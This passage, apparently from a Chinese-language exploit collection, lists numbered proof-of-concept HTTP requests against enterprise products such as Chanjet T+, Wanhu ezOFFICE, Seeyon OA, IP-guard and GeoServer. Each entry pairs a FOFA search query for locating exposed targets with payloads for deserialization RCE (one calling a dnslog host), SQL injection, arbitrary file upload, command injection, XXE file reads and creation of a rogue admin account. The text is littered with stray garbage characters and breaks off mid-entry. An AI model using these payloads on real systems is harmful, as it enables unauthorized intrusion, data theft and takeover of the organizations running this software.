9 H4 |( x& F% C$ u6 C5 o& }, ]) @# _8 k- \7 u
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
6 i( V$ c8 a- Y. E* @; s' D; IFOFA: app="畅捷通-TPlus"
! V& X1 L' e. U1 K- q8 |& X+ U; q+ ]5 O0 FPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1/ k3 l0 `  j) Y( K2 X- F' F
Host: x.x.x.x4 y3 Y4 R2 @5 n8 ?9 o! P( |$ V# r- c7 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36, i# T9 _0 d9 o3 M$ O
Content-Type: application/json
* p1 v# s% x# Z5 A: }/ @( [9 Z; `1 V
{5 w) H- F+ o0 B* L5 R3 r( z3 o4 l
  "storeID":{9 f7 ]6 {* d6 X5 v9 L
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
* S4 i1 a: R) y+ g" S1 L) [   "MethodName":"Start",! I9 ]) f+ r/ }2 O3 `+ H1 r1 [; t1 F
    "ObjectInstance":{
& h# j0 c0 \4 X8 v9 [& [1 d       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 R5 ]. E" u1 {( N% N* V0 b        "StartInfo": {7 B3 m4 N& u7 }8 i/ E4 q9 W
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; t' @, u) I% ^: ?" p# d5 @8 n           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"# i$ i" a0 H" K+ c: n8 o0 ^
       }) E% d0 j% }: w8 @4 U, G, D
    }
  N! F" \' p  \, [  }$ T- `8 w9 J% Z
}
/ S7 h5 r; R8 e
1 n: a7 y: P) o9 W; D7 D1 o6 r0 y: v- L' p( j4 J, G; P
57. 畅捷通T+ keyEdit.aspx SQL注入
$ Q4 i2 c" S$ b% CFOFA:app="畅捷通-TPlus"
8 a. ?' x2 k) g. t0 I( B  c5 {5 OGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.16 r- D9 q, [) b9 z' q, C4 F9 T
Host: host
( z1 m- O9 c7 p3 PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! ~0 W* p: K" GAccept-Charset: utf-8
0 F9 U0 {3 X' o- O( A6 Y2 JAccept-Encoding: gzip, deflate% i# i, Z% c0 J1 Z8 a. X
Connection: close
: K$ k- _2 _/ g# F6 R0 [7 q9 t' W4 r3 P7 A! G1 g2 e" f
' a! H2 q! P, ?5 w$ s% `4 u
58. 畅捷通T+ KeyInfoList.aspx sql注入
' |0 W5 l; `* r' L/ sFOFA:app="畅捷通-TPlus"  C) p8 p3 p( I' `! t
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
; B4 N! X2 D" Y% UHost: your-ip
, m: H0 U7 \2 N7 |User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
  G! _  X, b/ iAccept-Charset: utf-8
8 }: {  V8 ^. G9 uAccept-Encoding: gzip, deflate
* {  Y# V( i+ S7 D( GConnection: close! L% ~! H+ W3 C' D+ s! d* g$ w% }. g

( k5 Y& P1 P" e3 K5 X! w( i7 R9 P4 t
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行" t# [6 d5 I4 }1 `! o  E
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
' x/ h& _1 U0 y5 {0 L8 w. b1 wPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.13 A7 F" }* T0 E9 [1 a( v3 T/ T
Host: 192.168.86.128:90900 C/ C* i* ?( M8 k5 y
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
1 D6 K, a4 Q8 x+ X5 G0 }Connection: close8 y0 t& P9 _  x% o& n
Content-Length: 1669
$ w8 V# m3 N0 {Accept: */*
7 l4 p6 J* X! Q3 o; w9 C' mAccept-Language: en; p" e: _" z/ X1 ~( n4 _
Content-Type: application/x-www-form-urlencoded5 J; d8 i) o" v6 a4 n# ?1 q
Accept-Encoding: gzip
  w# u8 C6 y# o& C: {2 c; |7 K+ Q# f$ |; I+ u! h+ Z3 @
PAYLOAD. v! I4 b* v6 ^8 Q
4 l" a2 u" f. g3 Y8 w0 k2 c' e
$ i9 }1 R* V, C
60. 百卓Smart管理平台 importexport.php SQL注入; ?* N; N( p$ X( T" K) ]: u  x8 B  T. m
FOFA:title="Smart管理平台"& c0 P! ?! D; j# I
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1$ ^7 Y4 |/ Y7 s& E8 R9 p
Host:* W# H) z! X# W0 M3 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) J5 s' w+ _2 N! oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! o- M8 G% {0 y( ]+ k7 |Accept-Encoding: gzip, deflate
5 Q7 R- H3 I: ^Accept-Language: zh-CN,zh;q=0.9
  n. I; d( b2 v; }7 v9 s" bConnection: close
7 G( r! }1 N. y# @
- L* Y- ~5 H. ~2 e' U+ o/ ~1 O% y  u4 i: `
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传5 F  P1 L6 s( `9 B$ I' A
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
% Z& ~6 j7 e4 a. _; [POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1) J8 D* {2 {$ `
Host: x.x.x.x
7 s, q' e+ S+ {: e6 X# S3 {4 i2 K; `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' p0 z8 x  U& E8 I, @( A$ yConnection: close) q! s  W1 M0 e9 |) @( w9 I) @" X2 `
Content-Length: 27
$ Q6 T' U3 K* @, ~Accept: */*
3 ^2 J$ E6 [( Q! iAccept-Encoding: gzip, deflate9 {, [+ D0 I' V/ S
Accept-Language: en
6 D1 T1 G/ m3 N# y9 D, k1 U4 j; i4 i; mContent-Type: application/x-www-form-urlencoded
4 H$ Z, x8 ~9 ?1 x% @& `# t3 i  f" _2 z
8uxssX66eqrqtKObcVa0kid98xa! }7 R2 S  o  S( B+ r( J; l

1 o, X, M$ A( y9 T
, `3 ?4 y& B, ]2 P62. IP-guard WebServer 远程命令执行& c- A" Q4 l6 b$ b7 |
FOFA:"IP-guard" && icon_hash="2030860561"2 f. c7 ~  x0 W6 F7 g* H
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
- ?  o5 e- p& y9 y* f, [# UHost: x.x.x.x. N, W# ?6 I# {3 s
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 ^% {; a! x1 u4 ~: q0 t5 X8 @9 wConnection: close
! R4 j8 Z; Z. E! [0 v" eAccept: */*  _: A5 P, o6 O3 z, O6 Q: w
Accept-Language: en
4 t: \5 L0 k) E' tAccept-Encoding: gzip
2 n$ q1 X0 e5 d) C# J# U; ~0 S7 Q) a, A; ~6 [) g/ w

/ z8 m( @9 A- w8 c' K访问
, {& [2 R; _3 r7 {4 W" P% J5 o+ w% f* L
' \& H: v$ d9 y6 [GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1- U+ j& B4 W$ `8 z# \
Host: x.x.x.x
9 t/ k8 R# r+ B" i/ J( v
8 [6 R7 P3 d# D8 i7 B% b/ k( B0 Z: }6 a
63. IP-guard WebServer任意文件读取6 D; @! f. @" w+ @! ~# H  @* v; i
IP-guard < 4.82.0609.0
; Q6 Y% s. t, {/ V6 S) HFOFA:icon_hash="2030860561"
6 z/ \' U6 U' K' H6 fPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
+ r7 f& K7 p0 ?( k' a0 @; D3 fHost: your-ip+ m! _2 d- Y$ m8 z3 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 a: y" B9 ~+ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& ]/ I7 I+ @1 v( ^% ?2 K
Accept-Encoding: gzip, deflate
! d! Q, P+ r  l0 [Accept-Language: zh-CN,zh;q=0.9
; c" U3 J5 t6 S5 WConnection: close
1 @$ y. I# `; O/ _3 A0 i" Y+ \Content-Type: application/x-www-form-urlencoded
0 ~$ l' d4 R: S1 g9 h
% J! l1 s7 [8 G* n+ p" M; \: V$ Dpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
, \4 x4 I; m+ B6 s" ]# P; {# F5 i2 M# q$ E
64. 捷诚管理信息系统CWSFinanceCommon SQL注入, e2 e4 ^% w7 Q( P
FOFA:body="/Scripts/EnjoyMsg.js"; \# z5 z% V& q' L3 V
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.17 x2 P* j2 W; [, G$ o: {( r' z
Host: 192.168.86.128:90019 `* e2 X1 k1 F8 s
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
/ \& c4 G7 l. P1 z' A% QConnection: close
% \$ d. q; Q' ~+ e5 S2 A: _Content-Length: 369/ h6 k; Y) O3 Y( H! h0 E
Accept: */*
1 \3 H  ^+ C! w6 o) _9 S5 H; G6 V4 fAccept-Language: en
2 o9 ~" V6 v+ T7 ~, IContent-Type: text/xml; charset=utf-8
- k- R/ s. y1 X9 |- lAccept-Encoding: gzip
( B/ r. g& Z) K. ~) p
9 w* H" V7 k: ]9 Z0 V<?xml version="1.0" encoding="utf-8"?>7 }' W8 u) W/ F% ~' `
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 e# j2 L* k1 P' K( f2 }" D
<soap:Body>9 Q' u: i! l! ]* E. h6 B' r
    <GetOSpById xmlns="http://tempuri.org/">7 _( @4 V* A- f7 ]+ v' u# c" _
      <sId>1';waitfor delay '0:0:5'--+</sId>
$ y/ ~2 x- T% l" }7 b    </GetOSpById>
6 ]! n% T6 P: |" P1 g' V! ?  </soap:Body>
% Y0 z4 o) T0 e4 S8 K  Q</soap:Envelope>
  X# X; W) E  o3 S$ u# Q" B) {( t% z0 r) C
3 [! V7 b+ I2 J* d% C! V" C6 X
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
1 W/ r0 e  s8 o$ b% ?FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"8 G8 [. x5 s$ f( |
响应200即成功创建账号test123456/123456( T& ^7 @, C0 f/ k* u/ Z- T
POST /SystemMng.ashx HTTP/1.1
0 B0 o+ w: o5 w: I4 K& e6 RHost:) S0 u  K# i9 O% \
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
! h) d9 r+ B/ T3 J* {2 FAccept-Encoding: gzip, deflate
, w; p' ]! _4 {2 ~# DAccept: */*( A  t# @0 j& r; b% O3 Y- D
Connection: close
: d3 I$ y: j" ^6 F* ZAccept-Language: en7 [4 L) Z5 p7 o: Q
Content-Length: 174
4 N2 X& A3 H6 X: Q1 E3 f1 J$ [" B! [% g0 B
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators  t* e7 ^4 {, I- a8 ^! l2 O7 q

+ V3 o  G/ b  a7 _* u5 \, T1 A$ n$ B+ {( J6 A0 b- H& s# ]
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入0 U( X- |( P' q' z5 G, D! n; P
FOFA:app="万户ezOFFICE协同管理平台"2 b% s7 I# c6 u- d

$ F3 P/ Q5 o: X: V7 bGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1$ y2 o/ m  W2 a2 q
Host: x.x.x.x
- x  r2 l% n2 Q. |, v+ q  _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 W3 J6 d& |1 {2 B8 Y: `, a$ w- P  bConnection: close0 x# n% N# w2 }6 t; K) @; |
Accept: */*% y/ s% C/ {9 M; Q
Accept-Language: en
! k3 _; C! ^) K4 _Accept-Encoding: gzip
8 w8 @# d$ S* F- z) B* ^6 ^% z' b6 o, q9 ^3 V" m8 L

$ b  D# U) M7 L0 d第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在9 `3 U. P/ t+ F! L

7 A# U; Q9 {* s7 i1 g& J67. 万户ezOFFICE wpsservlet任意文件上传8 ]6 @: f+ u7 M. ~) L5 d2 x( P
FOFA:app="万户网络-ezOFFICE"5 @$ Y/ d, [* w& N- u
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型8 A' B% f# I" _' x! @
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
' U: n: a; Y3 g. ~' jHost: x.x.x.x
8 P0 z* Y6 Q: ]) S1 ~- ^. G- `. oUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
! ?3 Y+ V: O, g4 a: Q1 VContent-Length: 173
  P+ i% I+ c2 _' WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
* A! X; b/ e: Z& b0 t1 c% S. N; eAccept-Encoding: gzip, deflate/ ?0 D- t1 U  t: J
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.39 k6 _7 y3 h& o1 L0 O2 X
Connection: close& U7 g  G! {9 f- n) c
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp& ?* ^0 x9 Z# a9 g2 P
DNT: 1; e$ a4 t1 k0 Y# k, r6 M4 @9 b9 h
Upgrade-Insecure-Requests: 18 _" p/ k" |# P7 p$ X
- K+ i+ @$ Z5 `
--ufuadpxathqvxfqnuyuqaozvseiueerp4 }7 A% z9 O' ]
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
0 b5 n/ R1 O: m! W. h% \# S4 Y' p8 I3 {
<% out.print("sasdfghjkj");%>
" }+ |5 ~: z# R--ufuadpxathqvxfqnuyuqaozvseiueerp--% c1 W7 z+ e% J# N# f- a, m0 \

, x, @# `/ @& _. a$ `( I( I
" p8 ^- w# {& C5 S; |! t9 u文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
0 U0 O& x& `! d* h2 i0 f2 a% |2 f( \9 b3 r! j  u
68. 万户ezOFFICE wf_printnum.jsp SQL注入+ W# j2 m& O/ {* r
FOFA:app="万户ezOFFICE协同管理平台": x0 d+ Z' R" v+ J7 O% K$ |
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1) k; m- }( A4 s3 k/ l6 {( N
Host: {{host}}. o  C( K  w# T: D3 K" u$ I* q' V% b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36! J/ C. J) Q: ^$ M) c
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
2 {* c  b' N: ]$ J9 u& t" l3 XAccept-Encoding: gzip, deflate; h) V, z/ m" n* c
Accept-Language: zh-CN,zh;q=0.9; R# r# Y+ M! B, Y1 N
Connection: close
7 W8 l( h! x, T
- T) }+ D9 G! P" X# R; l
* h% k$ F: K" t, |69. 万户 ezOFFICE contract_gd.jsp SQL注入3 D4 \+ ~3 `1 [* d( Z' n8 C
FOFA:app="万户ezOFFICE协同管理平台"
) r+ k( [: o2 e  e' L- ]1 t$ JGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.13 o  C8 K, a# ?, J
Host: your-ip" a0 Z' B8 \5 P
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.366 T' u( p) a  X- L
Accept-Encoding: gzip, deflate% R+ L/ Q3 o9 t0 T* [0 P
Accept: */*
1 Y* \+ w; z9 `" ~7 ^. a: bConnection: keep-alive3 a' p% j5 D( ^- R

4 c# x; `/ o3 r* J- c1 b; W5 T. |4 m6 r) p6 T& z  |
70. 万户ezEIP success 命令执行
* W% J, _- D6 I  k* ZFOFA:app="万户网络-ezEIP"
- d. V: e: J6 t8 m: JPOST /member/success.aspx HTTP/1.14 j3 I: c4 ?! d2 N5 t1 ]- A. q
Host: {{Hostname}}
9 r: W! m  E* o9 Q1 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
- A0 v$ ]; I2 B9 q2 JSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
, h+ H+ H$ c7 Z. z2 LContent-Type: application/x-www-form-urlencoded
  F2 M" }% o1 s2 x( y, e' p+ ZTYPE: C
2 x9 P- k, b: R7 |! BContent-Length: 16702, H: o) Z* b. J) i( z7 H2 N
- _+ K7 L0 n9 x9 j- J, G
__VIEWSTATE=PAYLOAD
  r: B. C$ E; M: M
4 z2 |; l' n2 ]7 Q
& e5 d8 X" w) ^' g# l71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( C& b7 N: W: i" M: j; W3 lFOFA:body="PM2项目管理系统BS版增强工具.zip"( |4 _  L& x6 f  x# d! d: Q7 o
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
1 S; p7 I6 w5 G; @- U& oHost: x.x.x.xx.x.x.x/ r3 j6 K9 R- ?
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' J' |# v2 L' X4 M. o
Connection: close
- \- @1 p: P$ R3 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 D% j, [( \  v8 a( ~" {% RAccept-Encoding: gzip, deflate9 T. }3 W: U1 Z, a9 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 W8 J/ g" _: P! a( PUpgrade-Insecure-Requests: 1
- n. i5 i7 p% Y
9 F, j! c7 j( l: @* t
, T2 N, l6 p+ z72. 致远OA getAjaxDataServlet XXE+ n- M, W% W3 I% o7 G1 y
FOFA:app="致远互联-OA". T$ @8 F3 N* q
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
, K, `9 O  C/ A1 l6 L0 f- s6 ?9 n2 hHost: 192.168.40.131:8099
+ F& r% I% [3 }User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! B! I6 W: A7 ^2 c" z# @  ?
Connection: close' M- z. u$ t* U' G  \/ z
Content-Length: 583% G$ n9 s" m. s1 |) ]4 F
Content-Type: application/x-www-form-urlencoded: q1 B  f2 ~% \& L/ ~
Accept-Encoding: gzip9 D$ W0 ?: x: D
, ?/ L1 @: V- A+ d" o
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E3 X1 c7 q8 O$ C" F

6 ?4 K; W2 q1 S" k0 g: ~& u! b+ V* {1 e" H
73. GeoServer wms远程代码执行: B* s' {4 l+ J; }; v' a
FOFA:icon_hash=”97540678”1 K6 i) H* x& T# Y1 p% g
POST /geoserver/wms HTTP/1.1/ t  `# I# }3 Z
Host:
/ \- u! z! f" _, v3 b; `0 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- l  ]' }8 f0 V, A" o' y
Content-Length: 1981. M: ~. `) S) j9 C$ f
Accept-Encoding: gzip, deflate' _% L0 Z' \6 ^1 x4 `
Connection: close" S5 Z8 B$ P- R- c* K
Content-Type: application/xml
3 @" b) B! L9 B% V' gSL-CE-SUID: 3
& F! t1 ]2 z1 {
: b, R  q$ v) ~4 ?/ nPAYLOAD/ O  Z4 i6 T8 F: z9 C: a9 o

1 ]2 f, `7 z6 N, h6 |  G" C! @! {6 c% k' H7 C/ h# A
74. 致远M3-server 6_1sp1 反序列化RCE
6 O# |7 t: B7 M1 e5 `& V* O9 TFOFA:title="M3-Server"
  i0 a' ]" x  f( `6 d9 XPAYLOAD
1 z5 [4 U$ Q6 o" @  q; r
- m2 B; ^" A5 n75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE1 e7 a" }; C3 Q/ U3 {4 F( e
FOFA:app="TELESQUARE-TLR-2005KSH"2 d2 P; @* }. e. K4 @1 |2 C
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1% k- n: \) Y. D. ^: A+ e2 ~+ w! ~
Host: x.x.x.x
6 q( U+ z8 Q( n+ ~& \. z6 F! o- E7 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( K- ~6 j  R6 X2 ZConnection: close
6 h9 l; e' O3 ^4 jAccept: */*- H9 u6 _5 o3 T3 _0 L
Accept-Language: en
" O+ x, ]+ W* QAccept-Encoding: gzip
. c. Z: k  u, G7 g/ |6 F3 S8 L
  u  c# H) P, ]$ w( a5 x8 C$ x4 }7 H" P) s
GET /cgi-bin/test28256.txt HTTP/1.1
5 u8 P6 g7 F: @- Y. {/ j; ?Host: x.x.x.x
( L; h! m1 E9 q, I) u/ T( p; C! V. p+ e4 y' x! j4 e

% {" _& T' `, C9 G76. 新开普掌上校园服务管理平台service.action远程命令执行9 k  [2 e' {& G
FOFA:title="掌上校园服务管理平台"$ p2 z8 z+ K6 e& U" T1 B2 W! y
POST /service_transport/service.action HTTP/1.1
, l. y. L5 Z  `$ H5 VHost: x.x.x.x- n4 _5 \" W& d1 j/ }' J, Y, |3 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.02 F+ a4 A1 j1 I9 y0 g9 |
Connection: close- j* K7 F& q5 z; @2 l, H5 {
Content-Length: 211
7 M) y: v3 D  E. i1 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' w' Q- S. p% O+ b1 ]) g9 b
Accept-Encoding: gzip, deflate5 ]! M; f# H) O) ?1 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) [. s3 c7 M6 ?" d) J0 ~5 a5 g- V7 ACookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4* }! M4 R2 w+ @; Y8 [; `7 C( M$ y
Upgrade-Insecure-Requests: 1
7 L+ G2 O3 h3 P# x' |9 A' i
/ Y9 D: ~+ T( z# f. ~3 \{1 I; B5 _  C/ g5 S; [
"command": "GetFZinfo",4 a3 v* l) Z# j
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"+ I5 l% z9 D. N: S
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"4 [2 ?3 c0 ~! c& O& q
}
  V# P8 k$ ?( f% `
7 n; X- C1 n, R  I5 h6 h+ @; {# _1 l' m& F& E3 S" t2 v
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1. h2 `2 j6 d# S% S) {
Host: x.x.x.x+ @" Y2 q  s' ~1 x, K0 C# W. J; j

4 z! s& m) H. i; w. o# S
3 q) L( Z  I& F
$ H+ L  ]7 j; @; i1 \8 W% J77. F22服装管理软件系统UploadHandler.ashx任意文件上传
  u# q, b& e3 u+ J+ B) ^0 V2 rFOFA:body="F22WEB登陆"2 H' U  j" G4 s
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.15 O$ W; ]& F, n# D
Host: x.x.x.x
; B; x4 r* n6 ]' X5 ?$ |4 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 m- L  q; S* a* l2 M0 QConnection: close, D6 V3 g9 q. a3 o' N, k6 C
Content-Length: 433* L1 n- k0 V' k+ e
Accept: */*
+ ?5 F7 l# V) W  P4 Z, X/ T" H% gAccept-Encoding: gzip, deflate% \' }( e3 |( V; M6 I8 l# n( ^7 C. u
Accept-Language: zh-CN,zh;q=0.9
( n( Z# D  r# s0 K: }7 e2 j! Q- JContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix0 h5 F, N5 }$ |; n6 d; s  z
2 q- @$ V% I. f( e+ N3 H* Z: c
------------398jnjVTTlDVXHlE7yYnfwBoix
/ `% n2 Y9 U3 f: Y$ _) }: YContent-Disposition: form-data; name="folder"
6 x/ y! T8 E$ f% f. C1 n3 X7 t3 ?& w; Q4 ?0 `# M. U) z
/upload/udplog
3 ~1 [1 R" v) V- r- J------------398jnjVTTlDVXHlE7yYnfwBoix
8 q8 ~  B% x( F! `! SContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
- e0 B; l) k2 k, }) `Content-Type: application/octet-stream, M: s% g1 k; r6 T! L

& ~+ v# `) b% dhello1234567
0 f9 R5 G' A# [% I8 |------------398jnjVTTlDVXHlE7yYnfwBoix
4 [; G. @: w( I9 q; e: F9 nContent-Disposition: form-data; name="Upload"
+ ]$ {9 e) c  F: K9 d1 Y2 P$ z, M2 w$ j! q
Submit Query6 T( v/ e2 R) n+ A/ r+ N
------------398jnjVTTlDVXHlE7yYnfwBoix--
& c. A/ l/ T8 g0 x5 w# J" J
5 _# C" B( }) a0 |  K8 C( _( u9 W3 |7 @0 U  V  X& o
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
. |% O  w6 l7 `8 z6 |FOFA:icon_hash="2001627082". _$ K4 ^6 b2 n0 I' d$ w
POST /Platform/System/FileUpload.ashx HTTP/1.1% k! n! b5 A2 q$ k. g; X5 ]" z
Host: x.x.x.x
. L& C% I. y* I3 @6 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& U! G9 W* A( D2 V9 r1 D% DConnection: close
$ v% K. N9 Q" N  w2 C, y: w( oContent-Length: 336
/ J0 G- r, T- }9 E! yAccept-Encoding: gzip0 k7 }! k; S( n0 U/ V9 |
